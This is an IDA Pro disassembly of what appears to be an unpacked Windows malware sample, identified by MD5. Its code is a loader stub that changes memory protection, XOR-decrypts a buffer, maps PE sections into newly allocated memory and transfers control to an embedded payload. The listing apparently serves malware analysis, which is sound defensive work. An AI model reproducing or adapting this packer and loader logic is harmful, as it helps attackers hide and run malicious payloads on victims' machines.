;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9AA667B2557263099FF153CD53D85FC9
; File Name : u:\work\9aa667b2557263099ff153cd53d85fc9_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000244 ( 580.)
; Section size in file : 00000244 ( 580.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dword_401000 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_401004 dd 7C801AD0h ; resolved to->KERNEL32.VirtualProtectdword_401008 dd 7C86B32Eh ; resolved to->KERNEL32.CreateJobSet align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_67 = byte ptr -67h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_53 = byte ptr 5Bh
push ebp
mov ebp, esp
mov ecx, 0
sub esp, 1Ch
call sub_40117C
push 2000h
pop [ebp+var_14]
push 1449ADA2h
pop [ebp+var_C]
push 7CB4E09h
pop [ebp+var_8]
mov ecx, [ebp+var_1C]
mov edx, ecx
add edx, 0FFFFFFAAh
shl ecx, 0Fh
lea eax, ds:6B9010h
shl edx, 0Dh
sub eax, ecx
and eax, 0FFFF0000h
add eax, edx
lea ebx, [ebp+var_67]
shr ecx, 2
lea edx, [eax-0ADF8Ch]
add ebx, [ebp+var_1C]
push dword ptr [ecx+edx]
pop dword ptr [ebx]
shr ecx, 1
lea eax, [eax+57088h]
neg ecx
add ecx, eax
push ecx
pop [ebp+var_14]
lea eax, [ebp+var_4]
push eax
push 4
push [ebp+var_10]
push [ebp+var_14]
call dword_401004 ; VirtualProtect
mov ecx, [ebp+var_10]
mov ebx, [ebp+var_14]
mov eax, [ebp+var_C]
add eax, [ebp+var_1C]
mov [ebp+var_4], 1
loc_40109E: ; CODE XREF: start+A7�j
xor [ebx], eax
sub ecx, 0FFFFFFADh
sub ecx, [ebp+var_1C]
jl short loc_4010B9
add eax, [ebp+var_8]
add eax, [ebp+var_4]
add ebx, 5Bh
sub ebx, [ebp+var_1C]
neg [ebp+var_4]
jmp short loc_40109E
; ---------------------------------------------------------------------------
loc_4010B9: ; CODE XREF: start+96�j
mov ebx, [ebp+var_14]
mov esi, ebx
lea ebx, [ebx+93h]
sub ebx, [ebp+var_1C]
mov ebx, [ebx]
add ebx, esi
xor edx, edx
mov dl, [ebx+6]
mov [ebp+var_18], edx
push 40h
push 3000h
push dword ptr [ebx+50h]
push dword ptr [ebx+34h]
call dword_401000 ; VirtualAlloc
mov [ebp+var_4], eax
push eax
push [ebp+var_14]
lea edx, [ebx+0ABh]
sub edx, [ebp+var_1C]
push dword ptr [edx]
call sub_40115F
lea esi, [ebx+0F8h]
loc_401103: ; CODE XREF: start+114�j
mov ecx, [ebp+var_4]
add ecx, [esi+0Ch]
push ecx
mov eax, [ebp+var_14]
mov ecx, 14h
add eax, [ecx+esi]
push eax
push dword ptr [esi+10h]
call sub_40115F
add esi, 28h
dec [ebp+var_18]
jnz short loc_401103
lea ecx, [ebx-2Fh]
add ecx, [ebp+var_1C]
mov ecx, [ecx]
add ecx, [ebp+var_4]
lea edx, [ebp+arg_53]
sub edx, [ebp+var_1C]
mov [edx], ecx
mov ecx, 8BF5C7E4h
add ecx, 1EC604F9h
mov eax, [ebp+var_4]
loc_401147: ; CODE XREF: start+13C�j
add eax, 4
cmp [eax], ecx
jnz short loc_401147
push eax
lea eax, dword_401194
push eax
push 38h
call sub_40115F
leave
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40115F proc near ; CODE XREF: start+E8�p start+109�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov ecx, [ebp+arg_0]
loc_40116D: ; CODE XREF: sub_40115F+15�j
mov al, [esi]
mov [edi], al
inc esi
inc edi
dec ecx
jnz short loc_40116D
pop edi
pop esi
leave
retn 0Ch
sub_40115F endp
; =============== S U B R O U T I N E =======================================
sub_40117C proc near ; CODE XREF: start+B�p
call dword_401008 ; CreateJobSet
sub esp, 0Ch
mov eax, large fs:18h
mov eax, [eax+34h]
mov [ebp-1Ch], eax
retn
sub_40117C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dword_401194 dd 0AABBCCDDh, 15Ah, 0 dd 643h, 0FC342D0h, 47C342D0h, 5071E842h, 924DAAD9h, 0E8C242D0h
dd 0E2167E4Bh, 4 dup(0)
dd 11F4h, 2 dup(0)
dd 1236h, 1000h, 5 dup(0)
dd 1214h, 1224h, 1204h, 0
dd 72430058h, 65746165h, 53626F4Ah, 7465h, 6956036Ah, 61757472h
dd 6C6C416Ch, 636Fh, 69560370h, 61757472h, 6F72506Ch, 74636574h
dd 454B0000h, 4C454E52h, 642E3233h, 6C6Ch
_text ends
; Section 3. (virtual address 00005000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00004800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 405000h
align 2000h
_idata2 ends
end start